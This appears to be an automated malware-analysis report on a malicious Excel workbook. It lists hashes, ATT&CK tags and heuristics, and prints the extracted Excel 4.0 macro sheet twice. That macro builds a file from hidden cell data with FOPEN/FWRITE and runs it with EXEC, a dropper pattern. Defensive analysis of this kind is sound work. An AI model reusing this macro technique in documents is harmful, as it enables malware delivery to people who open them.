Office (OOXML) malware analysis — malicious · 3ada926e99f9d4e8

MALICIOUS

Office (OOXML)

166.7 KB Created: 2021-09-13 09:41:09 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2021-09-25

MD5: f1122e1099dc023e326437e3bb5f6fc6 SHA-1: cac42782181eb05bd212ac158bc13268314ad588 SHA-256: 3ada926e99f9d4e88c3e40e0d964032570b6f7fc79f5aed25d3393ccbf106c7c

130 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains Excel 4.0 macros, which are known to be used for malicious purposes. The macros utilize dangerous functions like FOPEN, FWRITE, FCLOSE, EXEC, and HALT to download and execute a second-stage payload. The presence of these functions strongly suggests an attempt to compromise the user's system.

Heuristics 4

Excel 4.0 macro sheet (1 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Dangerous XLM formula APIs: FOPEN, FWRITE, FCLOSE, EXEC, HALT critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 1479 bytes

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	1479 bytes
SHA-256: `b0e9efa8281bd88f23deb4a06863ab585868826aad3adcc680af31ae9c2a187d`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><dimension ref="A144:B1652"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15"/><sheetData><row r="144" spans="1:1"><c r="A144" t="b"><f>FOPEN(GET.NOTE(Macro1!$B$231, 1, 200), 1+2)</f><v>0</v></c></row><row r="214" spans="1:1"><c r="A214" t="b"><f>FOR.CELL("GvnDUZQo",Sheet1!E165:T1762, TRUE)</f><v>0</v></c></row><row r="231" spans="2:2"/><row r="332" spans="1:1"><c r="A332" t="e"><f>FWRITE(Macro1!A144,CHAR(GvnDUZQo))</f><v>#NAME?</v></c></row><row r="356" spans="2:2"/><row r="446" spans="1:1"><c r="A446" t="b"><f>NEXT()</f><v>0</v></c></row><row r="547" spans="1:1"><c r="A547" t="b"><f>FCLOSE(Macro1!A144)</f><v>0</v></c></row><row r="1565" spans="1:1"><c r="A1565" t="b"><f>SET.VALUE(Macro1!$B$356, GET.NOTE(Macro1!$B$356, 1, 200))</f><v>0</v></c></row><row r="1625" spans="1:1"><c r="A1625" t="b"><f>EXEC(Macro1!$B$356)</f><v>0</v></c></row><row r="1652" spans="1:1"><c r="A1652" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><sheetProtection password="D833" sheet="1" objects="1" scenarios="1"/><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><legacyDrawing r:id="rId1"/></xm:macrosheet>

SHA-256: b0e9efa8281bd88f23deb4a06863ab585868826aad3adcc680af31ae9c2a187d

Preview script

First 1,000 lines of the extracted script

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><dimension ref="A144:B1652"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15"/><sheetData><row r="144" spans="1:1"><c r="A144" t="b"><f>FOPEN(GET.NOTE(Macro1!$B$231, 1, 200), 1+2)</f><v>0</v></c></row><row r="214" spans="1:1"><c r="A214" t="b"><f>FOR.CELL("GvnDUZQo",Sheet1!E165:T1762, TRUE)</f><v>0</v></c></row><row r="231" spans="2:2"/><row r="332" spans="1:1"><c r="A332" t="e"><f>FWRITE(Macro1!A144,CHAR(GvnDUZQo))</f><v>#NAME?</v></c></row><row r="356" spans="2:2"/><row r="446" spans="1:1"><c r="A446" t="b"><f>NEXT()</f><v>0</v></c></row><row r="547" spans="1:1"><c r="A547" t="b"><f>FCLOSE(Macro1!A144)</f><v>0</v></c></row><row r="1565" spans="1:1"><c r="A1565" t="b"><f>SET.VALUE(Macro1!$B$356, GET.NOTE(Macro1!$B$356, 1, 200))</f><v>0</v></c></row><row r="1625" spans="1:1"><c r="A1625" t="b"><f>EXEC(Macro1!$B$356)</f><v>0</v></c></row><row r="1652" spans="1:1"><c r="A1652" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><sheetProtection password="D833" sheet="1" objects="1" scenarios="1"/><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><legacyDrawing r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.